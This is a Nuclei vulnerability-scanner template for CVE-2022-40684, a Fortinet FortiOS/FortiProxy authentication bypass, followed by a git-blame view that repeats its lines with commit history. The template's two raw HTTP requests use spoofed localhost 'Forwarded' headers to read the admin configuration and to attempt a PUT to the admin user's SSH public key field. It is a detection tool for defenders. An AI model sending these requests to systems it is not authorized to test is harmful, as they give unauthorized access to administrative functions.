nuclei-templates/http/cves/2022/CVE-2022-40684.yaml

id: CVE-2022-40684

info:
  name: Fortinet - Authentication Bypass
  author: Shockwave,nagli,carlosvieira
  severity: critical
  description: |
    Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
    - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
    - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40684
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40684
    cwe-id: CWE-287
    epss-score: 0.96782
    cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
    epss-percentile: 0.9953
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortiproxy
  tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive

http:
  - raw:
      - |
        GET /api/v2/cmdb/system/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Node.js
        Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
        X-Forwarded-Vdom: root
      - |
        PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610

         {
          "ssh-public-key1":"{{randstr}}"
        }

    stop-at-first-match: true
    req-condition: true

    matchers-condition: or
    matchers:
      - type: word
        part: body_1
        words:
          - ENC XXXX
          - http_method
        condition: and

      - type: word
        part: body_2
        words:
          - Invalid SSH public key.
          - cli_error
        condition: and
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`id: CVE-2022-40684`

			`info:`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`name: Fortinet - Authentication Bypass`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`author: Shockwave,nagli,carlosvieira`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`reference:`
			`- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py`
			`- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/`
			`- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-40684`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`classification:`
Auto Generated CVE annotations [Fri Oct 21 08:16:09 UTC 2022] :robot: 2022-10-21 08:16:09 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Auto Generated CVE annotations [Tue Oct 25 14:05:39 UTC 2022] :robot: 2022-10-25 14:05:39 +00:00			`cvss-score: 9.8`
			`cve-id: CVE-2022-40684`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cwe-id: CWE-287`
			`epss-score: 0.96782`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cpe: cpe:2.3:a:fortinet:fortiproxy::::::::`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-percentile: 0.9953`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: fortinet`
			`product: fortiproxy`
			`tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`- raw:`
			`- \|`
			`GET /api/v2/cmdb/system/admin HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Node.js`
			`Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=`
			`X-Forwarded-Vdom: root`
			`- \|`
			`PUT /api/v2/cmdb/system/admin/admin HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Report Runner`
			`Content-Type: application/json`
			`Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;`
			`Content-Length: 610`

Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`{`
			`"ssh-public-key1":"{{randstr}}"`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`}`

			`stop-at-first-match: true`
			`req-condition: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`matchers-condition: or`
			`matchers:`
			`- type: word`
			`part: body_1`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- ENC XXXX`
			`- http_method`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`condition: and`

			`- type: word`
			`part: body_2`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- Invalid SSH public key.`
			`- cli_error`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`condition: and`